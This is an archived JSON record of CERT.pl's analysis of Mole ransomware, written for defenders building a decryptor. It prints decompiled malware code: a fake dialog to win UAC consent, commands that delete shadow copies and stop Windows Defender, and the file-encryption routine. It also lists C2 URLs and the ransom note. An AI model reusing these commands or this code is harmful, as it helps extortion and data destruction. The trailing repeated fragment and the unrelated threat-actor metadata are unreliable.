{ "id": "8d7e4ab5-cc54-4b60-8484-888c21818bd5", "created_at": "2026-04-06T00:19:06.201737Z", "updated_at": "2026-04-10T13:12:10.937166Z", "deleted_at": null, "sha1_hash": "3c51a6182f25213c64d7418dfefcb312ac8645fb", "title": "Mole ransomware: analysis and decryptor", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 203648, "plain_text": "Mole ransomware: analysis and decryptor\r\nArchived: 2026-04-05 16:11:38 UTC\r\nMole ransomware is almost month old ransomware (so it’s quite old from our point of view), that\r\nwas distributed mainly through fake online Word docs. It’s a member of growing CryptoMix family,\r\nbut encryption algorithm was completely changed (…again).\r\nWe became interested in this variant after victims contacted us asking for a decryptor. Remembering\r\nthat all members of this family so far were plagued with serious crypto flaws, we decided to give it\r\na try and reverse-engineered it thoroughly. It turned out to be a good idea – we were successful and\r\nmanaged to create working decryptor. It is no longer publicly available, but feel free to contact us if\r\nyou still need it.\r\nIn the rest of this article we will share detailed results of our research.\r\nCampaign and Behaviour\r\nMole ransomware was distributed through malspam linking to fake Microsoft Word documents.\r\nSaid documents prompted users to download and install a malicious plugin.\r\nBecause this variant is not new, it was analyzed by quite a lot of researchers before us. We don’t\r\nintend to copy their good work, so for anyone interested in the dynamic analysis we recommend\r\nlooking at following links:\r\nhttps://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nPage 1 of 12\n\nhttps://www.bleepingcomputer.com/news/security/mole-ransomware-distributed-through-fake-online-word-docs/\r\nhttp://researchcenter.paloaltonetworks.com/2017/04/unit42-mole-ransomware-one-malicious-spam-campaign-quickly-increased-complexity-changed-tactics/\r\nhttps://blog.watchpointdata.com/mole-ransomware-a-new-variant-of-cryptomix\r\nInstead, we’ll focus on a static analysis of the code and the encryption method.\r\nStatic analysis\r\nAs in many malware families, Mole won’t run in most Russian-speaking countries. Literally the\r\nfirst thing the binary does after being run is checking keyboard layout and charset – detecting\r\nRussian ones leads to immediate process termination. Otherwise, malware achieves persistence (by\r\nadding itself to the Autorun in the system’s registry), removes shadow copies (after Windows’\r\nversion check), and proceeds to the actual encryption:\r\nvoid start() {\r\nkbd_layout = GetKeyboardLayout(0) - 1049;\r\nif ( kbd_layout == 1049 || kbd_layout == 1058 // Russian or Ukrainian\r\n|| (v2 = GetDC(0), GetTextCharset(v2) == 204)) // RUSSIAN_CHARSET\r\nExitProcess(0);\r\nAchievePersistence();\r\nif ( !AlreadyEncrypted() ) {\r\nversion = GetWindowsVersionEnum();\r\nif ( version == 9 || version == 7 || version == 8 || version == 6 || version == 4 )\r\n{\r\nBecomeAdministrator();\r\nif ( IsAdmin_SidSubauthority() == 0x3000 )\r\n{\r\nWinExec(\"vssadmin.exe Delete Shadows /All /Quiet\", 0);\r\nWinExec(\"bcdedit /set {default} recoveryenabled No \", 0);\r\nWinExec(\"bcdedit /set {default} bootstatuspolicy ignoreallfailures\", 0);\r\nWinExec(\"sc stop wscsvc\", 0);\r\nhttps://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nPage 2 of 12\n\nWinExec(\"sc stop WinDefend\", 0);\r\nWinExec(\"sc stop wuauserv\", 0);\r\nWinExec(\"sc stop BITS\", 0);\r\nWinExec(\"sc stop ERSvc\", 0);\r\nWinExec(\"sc stop WerSvc\", 0);\r\n}\r\n}\r\n// ...\r\n}\r\n// ...\r\n}\r\nAfter being started ransomware tries to bypass the UAC and displays fake dialog message:\r\nDisplay Color Calibration can't turn off Windows calibration management.\r\nAccess is denied.\r\nAfter that, UAC prompt is shown and the user probably clicks “Yes” believing that he/she agrees to\r\n“Display Color Calibration”. Instead, as usual, malware relaunches itself with admin privileges, and\r\nShadow Volumes are deleted.\r\nvoid BecomeAdministrator() {\r\nif ( IsAdmin_SidSubauthority() != 0x3000 ) {\r\nMessageBoxW(\r\nhttps://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nPage 3 of 12\n\nGetForegroundWindow(),\r\nL\"Display Color Calibration can't turn off Windows calibration management.\\n\\nAccess is\r\ndenied.\",\r\nL\"Display Color Calibration\",\r\n0x10u);\r\nwhile ( GetModuleFileNameW(0, \u0026Filename, 0x104u) ) {\r\nwsprintfW(\u0026buffer, L\"process call create \\\"%s\\\"\", \u0026Filename);\r\npExecInfo.lpParameters = (LPCWSTR)\u0026buffer;\r\npExecInfo.cbSize = 60;\r\npExecInfo.lpVerb = L\"runas\";\r\npExecInfo.lpFile = L\"wmic\";\r\npExecInfo.hwnd = GetForegroundWindow();\r\npExecInfo.nShow = 0;\r\nif ( ShellExecuteExW(\u0026pExecInfo) )\r\nbreak;\r\n// ...\r\n}\r\n}\r\n}\r\nOf course ransomware doesn’t encrypt every file type. Interestingly, encrypted extensions are\r\nobfuscated – they were not hardcoded directly, but compared inside giant function, after\r\ntransformation with following algorithm:\r\nlstrcpyW((char *)ext, PathFindExtensionW(pszPath));\r\nCharUpperW(ext);\r\nif ( !ext[0] ) {\r\nreturn 0;\r\n}\r\nhttps://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nPage 4 of 12\n\nacc = ext[0];\r\nprev = 0\r\ndo\r\n{\r\n++ext;\r\nprev = acc ^ __ROL4__(prev, 7);\r\nacc = *ext;\r\n}\r\nwhile ( *ext );\r\nList of encrypted extensions:\r\n.0 .1CD .1PA .1ST .2BP .36 .3DM .3DS .3FR .3GP .411 .4DB .4DL .4MP .73I .7Z\r\n.8XI .A3D .AB4 .ABM .ABS .ABW .ACH .ACT .ADB .ADN .ADP .ADS .AES .AF2 .AF3\r\n.AFS\r\n.AFT .AFX .AGP .AHD .AI .AIC .AIF .AIM .AIT .AL .ALF .ANI .ANS .APD .APJ .APK\r\n.APM .APS .APT .APX .ARC .ART .ARW .ASC .ASE .ASF .ASK .ASM .ASP .ASW\r\n.ASX .ASY\r\n.ATY .AVI .AWP .AWT .AWW .AZZ .BAK .BAR .BAT .BAY .BBS .BC6 .BC7 .BD .BDB\r\n.BDP\r\n.BDR .BGT .BIB .BIG .BIK .BKF .BKP .BM2 .BMP .BMX .BMZ .BNA .BND .BOC\r\n.BOK .BPW\r\n.BRD .BRK .BRN .BRT .BSA .BSS .BTD .BTI .BTR .BYU .BZ2 .C .C4 .C4D .CAL .CAN\r\n.CAS .CD5 .CDB .CDC .CDF .CDG .CDR .CDT .CDX .CE1 .CE2 .CER .CF .CFG .CFP\r\n.CFR\r\n.CFU .CGM .CIN .CIT .CKP .CLS .CMA .CMD .CMT .CMX .CNM .CNT .CNV .CPC\r\n.CPD .CPG\r\n.CPI .CPP .CPS .CPT .CPX .CR2 .CRD .CRT .CRW .CS .CSH .CSL .CSR .CSS .CSV .CSY\r\n.CT .CV5 .CVG .CVI .CVS .CVX .CWT .CXF .CYI .DAC .DAD .DAF .DAS .DAT .DB\r\n.DB0\r\nhttps://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nPage 5 of 12\n\n.DB2 .DB3 .DBA .DBC .DBF .DBK .DBR .DBS .DBT .DBV .DBX .DC2 .DCA .DCB\r\n.DCH .DCR\r\n.DCS .DCT .DCX .DDD .DDL .DDS .DED .DER .DES .DF1 .DGC .DGN .DGS .DGT\r\n.DHS .DIB\r\n.DIF .DIP .DIZ .DJV .DM3 .DMI .DMO .DMP .DNC .DNE .DNG .DOC .DOT .DP1 .DPP\r\n.DPX\r\n.DQY .DRF .DRW .DRZ .DSK .DSN .DSV .DT .DT2 .DTA .DTD .DTW .DVI .DVL .DWG\r\n.DX\r\n.DXB .DXF .DXG .DXL .EBD .ECO .ECW .ECX .EDB .EFD .EGC .EIO .EIP .EIT .EMD\r\n.EMF\r\n.EML .EP .EPF .EPK .EPP .EPS .EQL .ERF .ERR .ESM .ETF .ETX .EUC .EXF .EXR .FAL\r\n.FAQ .FAX .FB2 .FB3 .FBL .FBX .FCD .FCF .FDB .FDF .FDR .FDS .FDT .FDX .FES .FF\r\n.FFD .FFF .FFT .FH .FH3 .FH4 .FH5 .FH6 .FH7 .FH8 .FHD .FIC .FID .FIF .FIG .FIL\r\n.FIM .FLA .FLC .FLI .FLR .FLV .FM .FM5 .FMP .FMV .FOL .FOS .FP3 .FP4 .FP5 .FP7\r\n.FPK .FPT .FPX .FRM .FRT .FSH .FT7 .FT8 .FT9 .FTN .FX0 .FX1 .FXC .FXG .FXR .FZB\r\n.FZV .G3 .GDB .GEM .GEO .GFB .GGR .GHO .GIF .GIH .GIM .GIO .GPD .GPG .GPN\r\n.GRO\r\n.GRS .GRW .GRY .GSD .GTP .GV .GWI .GZ .H .HBK .HDB .HDP .HDR .HHT .HIS\r\n.HKX\r\n.HPG .HPI .HPL .HPP .HS .HTC .HWP .HZ .I3D .IB .IBD .ICN .IDC .IDX .IGT .IGX\r\n.IHX .IIF .IIL .IIQ .IMD .INK .INT .IPF .IPX .ITL .ITM .ITW .IWD .IWI .J .J2C\r\n.J2K .JAS .JB2 .JBR .JIA .JIS .JNG .JOE .JP1 .JP2 .JPE .JPG .JPS .JPX .JS .JTF\r\n.JTX .JWL .JXR .K2P .KDB .KDC .KDI .KDK .KES .KEY .KF .KIC .KLG .KNT .KON\r\n.KPG\r\n.KWD .LAY .LBF .LBM .LBT .LGB .LGC .LIS .LIT .LJP .LMK .LNT .LOG .LP2 .LRC\r\n.LRF\r\n.LST .LTR .LTX .LUA .LUE .LUF .LVL .LWO .LWP .LWS .LYT .LYX .M .M2 .M3D\r\n.M3U\r\n.M4A .M4V .MA .MAC .MAF .MAM .MAN .MAP .MAQ .MAR .MAT .MAW .MAX .MB\r\n.MBM .MCL\r\nhttps://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nPage 6 of 12\n\n.MDB .MDC .MDE .MDF .MDN .MDT .ME .MEF .MFT .MFW .MIN .MKV .MLX .MML\r\n.MMW .MNG\r\n.MNR .MNT .MOS .MOV .MP3 .MP4 .MPF .MPG .MPO .MPP .MRG .MRW .MSG .MSO\r\n.MT9 .MTE\r\n.MUD .MWB .MWP .MX0 .MXL .MYD .MYI .MYL .NCF .NCR .NCT .ND .NDD .NDF\r\n.NEF .NFO\r\n.NJX .NK2 .NLM .NOW .NRW .NS2 .NS3 .NS4 .NSD .NSF .NSG .NSH .NTL .NV2\r\n.NWB .NX1\r\n.NX2 .NYF .NZB .OBJ .OC3 .OC4 .OC5 .OCE .OCI .OCR .ODB .ODC .ODF .ODG .ODM\r\n.ODO\r\n.ODP .ODS .ODT .OFL .OFT .OIL .OMF .ONE .OQY .ORA .ORF .ORT .ORX .OTA .OTG\r\n.OTH\r\n.OTI .OTP .OTS .OTT .OVP .OVR .OWC .OWG .OYX .OZB .OZJ .OZT .P12 .P7B .P7C\r\n.P7S\r\n.P96 .P97 .PAK .PAL .PAN .PAP .PAQ .PAS .PAT .PBM .PBO .PC1 .PC2 .PC3 .PCD .PCS\r\n.PCT .PCX .PDB .PDD .PDF .PDM .PDN .PE4 .PEF .PEM .PFD .PFF .PFI .PFS .PFV\r\n.PFX\r\n.PGF .PGM .PHM .PHP .PI1 .PI2 .PI3 .PIC .PIP .PIX .PJT .PL .PLC .PLT .PM .PMG\r\n.PNG .PNI .PNM .PNZ .POP .POT .PP4 .PP5 .PPM .PPS .PPT .PRF .PRT .PRW .PS .PSD\r\n.PSE .PSK .PSP .PST .PSW .PTG .PTH .PTX .PU .PUB .PUZ .PVJ .PVM .PVR .PWA .PWI\r\n.PWR .PX .PXR .PY .PZ3 .PZA .PZP .PZS .QBA .QBI .QBO .QBP .QBR .QBT .QBW\r\n.QBY\r\n.RB .RM .RNG .RPD .RPF .RPT .RRI .RS .RSB .RSD .RSR .RST .RT .RTD .RTF .RTP\r\n.RTX .RUN .RW2 .RWL .RWZ .RZK .RZN .S3M .SAF .SAI .SAM .SAY .SB .SBF .SCC\r\n.SCH\r\n.SCI .SCM .SCT .SCV .SCW .SD0 .SDA .SDB .SDF .SDM .SDW .SEP .SET .SFC .SFW\r\n.SGM\r\n.SID .SIE .SIG .SIS .SK1 .SK2 .SKM .SLA .SLD .SLK .SLM .SLS .SMF .SMS .SNP .SNX\r\n.SOB .SPA .SPE .SPH .SPJ .SPP .SPQ .SPR .SQB .SQL .SR2 .SRF .SRT .SRW .SSA .SSK\r\n.ST .ST4 .ST5 .ST6 .ST7 .ST8 .STC .STD .STE .STI .STM .STN .STP .STR .STW .STX\r\nhttps://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nPage 7 of 12\n\n.STY .SUB .SUM .SVA .SVF .SVG .SWF .SXC .SXD .SXG .SXI .SXM .SXW .T12 .T13\r\n.T2B\r\n.TAB .TAR .TAX .TB0 .TBN .TCX .TDF .TDT .TE .TEX .TFC .TG4 .TGA .TGZ .THM\r\n.THP\r\n.TIF .TJP .TLB .TLC .TM .TM2 .TMD .TMP .TMV .TMX .TN .TNE .TOR .TPC .TPI\r\n.TRM\r\n.TVJ .TXT .U3D .U3I .UDB .UFO .UFR .UGA .UNX .UOF .UOP .UOT .UPD .UPK .USR\r\n.V12\r\n.V30 .VBR .VBS .VCF .VCT .VDA .VDB .VDF .VEC .VFF .VML .VNT .VOB .VPD\r\n.VPE .VPK\r\n.VRP .VSD .VSM .VST .VSX .VTF .VTX .VUE .VW .W3X .WAV .WB1 .WB2 .WBC\r\n.WBD .WBK\r\n.WBM .WBZ .WCF .WDB .WDP .WGZ .WKS .WLL .WMA .WMF .WMO .WMV .WN\r\n.WP .WP4 .WP5\r\n.WP6 .WP7 .WPA .WPB .WPD .WPE .WPG .WPL .WPS .WPT .WPW .WRI .WSC .WSD\r\n.WSH .WTX\r\n.WVL .X .X11 .X3D .X3F .XAR .XDB .XDL .XF .XLA .XLB .XLC .XLD .XLF .XLL\r\n.XLM\r\n.XLR .XLS .XLT .XLW .XML .XPM .XPP .XPS .XSN .XWP .XXX .XY3 .XYP .XYW .Y\r\n.YAL\r\n.YBK .YML .YSP .YUV .Z3D .ZDB .ZDC .ZIF .ZIP .ZW\r\nAnd as usual, the most interesting thing in any ransomware is actual file encryption algorithm. In\r\nthis case it can be summarized as follows (half-decompiled, half-handwritten pseudo-c++ code with\r\nnon essential parts omitted):\r\nint EncryptFile(...) {\r\n// ...\r\nif (filehandle != -1) {\r\nfiledata = (void *)GlobalAlloc(64, filedata_len);\r\nif (filedata) {\r\nReadFile(filehandle, filedata, filedata_len, \u0026NumberOfBytesRead, 0);\r\nhttps://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nPage 8 of 12\n\nCloseHandle(filehandle);\r\nrc4_key = VirtualAlloc(0, 0x75u, 0x3000u, 4u);\r\ni = 0;\r\ndo {\r\ncurrent_ticks = GetTickCount();\r\nif ( current_ticks != last_tick_count ) {\r\nlast_tick_count = current_ticks;\r\nmt_srand(current_ticks);\r\n}\r\nrc4_key[i++] = mt_rand() % 0x65 + 22;\r\n}\r\nwhile ( i \u003c 117 );\r\nif ( !*rc4_key \u0026\u0026 !rc4_key[1] \u0026\u0026 !rc4_key[2] \u0026\u0026 !rc4_key[3] \u0026\u0026 !rc4_key[5] )\r\nmemcpy(rc4_key, \u0026hardcoded_last_resort_key, 117); // check in case mt_rand miraclously\r\ngenerated only zeroes?\r\nrc4_init(rc4_key, 117, \u0026rc4pad);\r\nrc4_encrypt(filedata, filedata_len, \u0026rc4pad);\r\nCoCreateGuid(\u0026pguid);\r\nwsprintfW(NewFileName, L\"%s%08X%08X%08X%08X.MOLE\", a2); // rename file to\r\nrandom GUID\r\nouthandl = (void *)CreateFileW(NewFileName, 0x40000000, 2, 0, 2, 128, 0);\r\nhFile = 0;\r\nWriteFile(outhandl, filedata, filedata_len, \u0026hFile, 0);\r\nSetFilePointer(outhandl, 0, 0, 2u);\r\nWriteFile(outhandl, \"|%^\u0026*\", 5, \u0026hFile, 0);\r\nrc4_init((int)rc4_key, 117, (int)\u0026rc4pad);\r\nrc4_encrypt((int)\u0026filename, filename_len, \u0026rc4pad);\r\nhttps://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nPage 9 of 12\n\nSetFilePointer(outhandl, 0, 0, 2u);\r\nWriteFile(outhandl, \u0026filename, filename_len, \u0026hFile, 0);\r\nSetFilePointer(outhandl, 0, 0, 2u);\r\nWriteFile(outhandl, \"|%^\u0026*\", 5, \u0026hFile, 0);\r\nSetFilePointer(outhandl, 0, 0, 2u);\r\nfilename_len = 0;\r\nrc4key_enc = EncryptWithRsa(rc4_key, \u0026filename_len, a1);\r\nWriteFile(outhandl, rc4key_enc, filename_len, \u0026hFile, 0);\r\nSetFilePointer(WriteFile, 0, 0, 2u);\r\nWriteFile(outhandl, \"|%^\u0026*\", 5, \u0026hFile, 0);\r\nGlobalFree(filedata);\r\nVirtualFree(rc4_key, 0, 0x8000u);\r\nCloseHandle(outhandl);\r\nDeleteFileW(FileName);\r\nreturn 1; // success\r\n}\r\n// ...\r\n}\r\n// ...\r\n}\r\nOr in terse pseudocode:\r\nfile_data = read_file(filename)\r\nticks = GetTickCount()\r\nif last_seed_time != ticks:\r\nmt_srand(ticks)\r\nlast_seed_time = ticks\r\nhttps://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nPage 10 of 12\n\nrc4_pass = ''\r\nfor i in range(117):\r\nrc4_pass += mt_rand() % 0x65 + 22\r\nrc4_key = rc4_key_sched(rc4_pass)\r\nresult = ''\r\nresult += rc4_encrypt(file_data, rc4_key)\r\nresult += '|%^\u0026*'\r\nresult += rc4_encrypt(filename, rc4_key)\r\nresult += '|%^\u0026*'\r\nresult += rsa_encrypt(rc4_key, rsa_public_key)\r\nresult += '|%^\u0026*'\r\nout_filename = RandomGuid() + \".MOLE'\r\nwrite_file(out_filename, result)\r\nThis method is not perfect for a lot of reasons, but we’ll skip detailed cryptanalysis here.\r\nGeneral structure of encrypted file looks like this:\r\nIt’s very similar to Revenge ransomware, that is why we believe that Mole is next version of\r\nRevenge. On the other hand, RC4 is used here instead of more sophisticated (and stronger) AES. It\r\ndoesn’t change much, as RC4 is still strong enough for most ransomware purposes, but we’re not\r\nsure why ransomware creators decided to take this step back.\r\nHashes/patterns\r\nSha256 hashes of binaries:\r\n03974017388c6085175f111ee26c3833448b0551acf11063a13a916a75844321\r\na4916151059e5f4065f1fb230f06205d1c9cddc5c779984b108e77a22e7c32e9\r\nhttps://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nPage 11 of 12\n\n0a3c26a388e6ede8e08a33ddc3c9aece079d5d6c752854e16d216e134ed3d357\r\n8e210658f17a265f0c595b4f63ee7ba3db4c83f64c93f522e74e57e6fc547b11\r\nNetwork communication:\r\nhttp://94.198.98.20/images/gif/info-static.php\r\nhttp://212.47.254.187/scripts/superfish/js/supersubs.php\r\nRansom note:\r\nAll your important files were encrypted on this computer.\r\nYou can verify this by click on see files an try open them.\r\nEncryption was produced using unique public key RSA-1024 generated for this computer.\r\nTo decrypted files, you need to obtain private key.\r\nThe single copy of the private key, with will allow you to decrypt the files, is locate on a\r\nsecret server on the internet.\r\nThe server will destroy the key within 78 hours after encryption completed.\r\nTo retrieve the private key, you need to Contact us by email , send us an email your\r\nDECRYPT-ID-41bd40a5-4e9f-4c44-9e3b-e895fc3a5d6b number\r\nand wait for further instructions.\r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file\r\nand we will send you back it in a decrypted form.\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will\r\ndouble your price!\r\nE-MAILS ADRESS:\r\noceanm@engineer.com\r\noceanm@india.com\r\nSource: https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nhttps://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/\r\nPage 12 of 12\n\nwhile ( *ext List of encrypted extensions: ); \n.0 .1CD .1PA .1ST .2BP .36 .3DM .3DS .3FR .3GP .411 .4DB .4DL .4MP .73I .7Z\n.8XI .A3D .AB4 .ABM .ABS .ABW .ACH .ACT .ADB .ADN .ADP .ADS .AES .AF2 .AF3\n.AFS \n.AFT .AFX .AGP .AHD .AI .AIC .AIF .AIM .AIT .AL .ALF .ANI .ANS .APD .APJ .APK\n.APM .APS .APT .APX .ARC .ART .ARW .ASC .ASE .ASF .ASK .ASM .ASP .ASW\n.ASX .ASY \n.ATY .AVI .AWP .AWT .AWW .AZZ .BAK .BAR .BAT .BAY .BBS .BC6 .BC7 .BD .BDB\n.BDP \n.BDR .BGT .BIB .BIG .BIK .BKF .BKP .BM2 .BMP .BMX .BMZ .BNA .BND .BOC\n.BOK .BPW \n.BRD .BRK .BRN .BRT .BSA .BSS .BTD .BTI .BTR .BYU .BZ2 .C .C4 .C4D .CAL .CAN\n.CAS .CD5 .CDB .CDC .CDF .CDG .CDR .CDT .CDX .CE1 .CE2 .CER .CF .CFG .CFP\n.CFR \n.CFU .CGM .CIN .CIT .CKP .CLS .CMA .CMD .CMT .CMX .CNM .CNT .CNV .CPC\n.CPD .CPG \n.CPI .CPP .CPS .CPT .CPX .CR2 .CRD .CRT .CRW .CS .CSH .CSL .CSR .CSS .CSV .CSY\n.CT .CV5 .CVG .CVI .CVS .CVX .CWT .CXF .CYI .DAC .DAD .DAF .DAS .DAT .DB\n.DB0 \n Page 5 of 12 \n\n.EML .EP .EPF .FAQ .FAX .FB2 .EPK .EPP .EPS .FB3 .FBL .EQL .ERF .FBX .FCD .FCF .ERR .ESM .FDB .FDF .ETF .ETX .FDR .FDS .EUC .EXF .FDT .FDX .EXR .FAL .FES .FF\n.FFD .FFF .FFT .FH .FH3 .FH4 .FH5 .FH6 .FH7 .FH8 .FHD .FIC .FID .FIF .FIG .FIL\n.FIM .FLA .FLC .FLI .FLR .FLV .FM .FM5 .FMP .FMV .FOL .FOS .FP3 .FP4 .FP5 .FP7\n.FPK .FPT .FPX .FRM .FRT .FSH .FT7 .FT8 .FT9 .FTN .FX0 .FX1 .FXC .FXG .FXR .FZB\n.FZV .G3 .GDB .GEM .GEO .GFB .GGR .GHO .GIF .GIH .GIM .GIO .GPD .GPG .GPN\n.GRO \n.GRS .GRW .GRY .GSD .GTP .GV .GWI .GZ .H .HBK .HDB .HDP .HDR .HHT .HIS\n.HKX \n.HPG .HPI .HPL .HPP .HS .HTC .HWP .HZ .I3D .IB .IBD .ICN .IDC .IDX .IGT .IGX\n.IHX .IIF .IIL .IIQ .IMD .INK .INT .IPF .IPX .ITL .ITM .ITW .IWD .IWI .J .J2C \n.J2K .JAS .JB2 .JBR .JIA .JIS .JNG .JOE .JP1 .JP2 .JPE .JPG .JPS .JPX .JS .JTF \n.JTX .JWL .JXR .K2P .KDB .KDC .KDI .KDK .KES .KEY .KF .KIC .KLG .KNT .KON\n.KPG \n.KWD .LAY .LBF .LBM .LBT .LGB .LGC .LIS .LIT .LJP .LMK .LNT .LOG .LP2 .LRC\n.LRF \n.LST .LTR .LTX .LUA .LUE .LUF .LVL .LWO .LWP .LWS .LYT .LYX .M .M2 .M3D\n.M3U \n.M4A .M4V .MA .MAC .MAF .MAM .MAN .MAP .MAQ .MAR .MAT .MAW .MAX .MB\n.MBM .MCL \n Page 6 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" ], "report_names": [ "mole-ransomware-analysis-and-decryptor" ], "threat_actors": [ { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434746, "ts_updated_at": 1775826730, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3c51a6182f25213c64d7418dfefcb312ac8645fb.pdf", "text": "https://archive.orkl.eu/3c51a6182f25213c64d7418dfefcb312ac8645fb.txt", "img": "https://archive.orkl.eu/3c51a6182f25213c64d7418dfefcb312ac8645fb.jpg" } }